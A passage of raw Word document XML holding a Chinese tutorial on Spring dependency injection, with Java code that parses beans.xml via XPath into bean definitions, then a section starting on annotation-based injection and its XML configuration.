          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"//ns:beans/ns:bean"</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>beans/bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>查询路径</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xsub.setNamespaceURIs(nsMap);</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>设置命名空间</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List&lt;Element&gt; beans = xsub.selectNodes(document);</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>获取文档下所有</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>节点</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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Element element : beans)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String id = element.attributeValue(</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>属性值</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String clazz = element.attributeValue(</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"class"</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>属性值</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 xml:space="preserve">BeanDefinition beanDefine = </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> BeanDefinition(id, clazz);</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XPath propertysub = element.createXPath(</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"ns:property"</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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propertysub.setNamespaceURIs(nsMap);</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>设置命名空间</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List&lt;Element&gt; propertys = propertysub.selectNodes(element);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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Element property : propertys)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String propertyName = property.attributeValue(</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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String propertyRef = property.attributeValue(</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"ref"</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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lastRenderedPageBreak/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>String propertyValue = property.attributeValue(</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"value"</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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 xml:space="preserve">PropertyDefinition propertyDefinition = </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> PropertyDefinition(propertyName, propertyRef, propertyValue);</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beanDefine.getPropertys().add(propertyDefinition);</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beanDefines.add(beanDefine);</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 xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Exception e)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e.printStackTrace();</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   * </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>实例</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   *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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   * @param beanName</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   * @return</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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public</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Object getBean(String beanName)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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.sigletons.get(beanName);</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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szCs w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRPr="00134F57" w:rsidRDefault="00134F57" w:rsidP="00134F57">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:line="370" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>二、</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注解注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRPr="00134F57" w:rsidRDefault="00134F57" w:rsidP="00134F57">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:line="370" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>common-annotations.jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F57" w:rsidRPr="00134F57" w:rsidRDefault="00134F57" w:rsidP="00134F57">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:line="370" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>中做如下配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>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b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;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000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;beans </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>xmlns</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>"http://www.springframework.org/schema/beans"</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000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
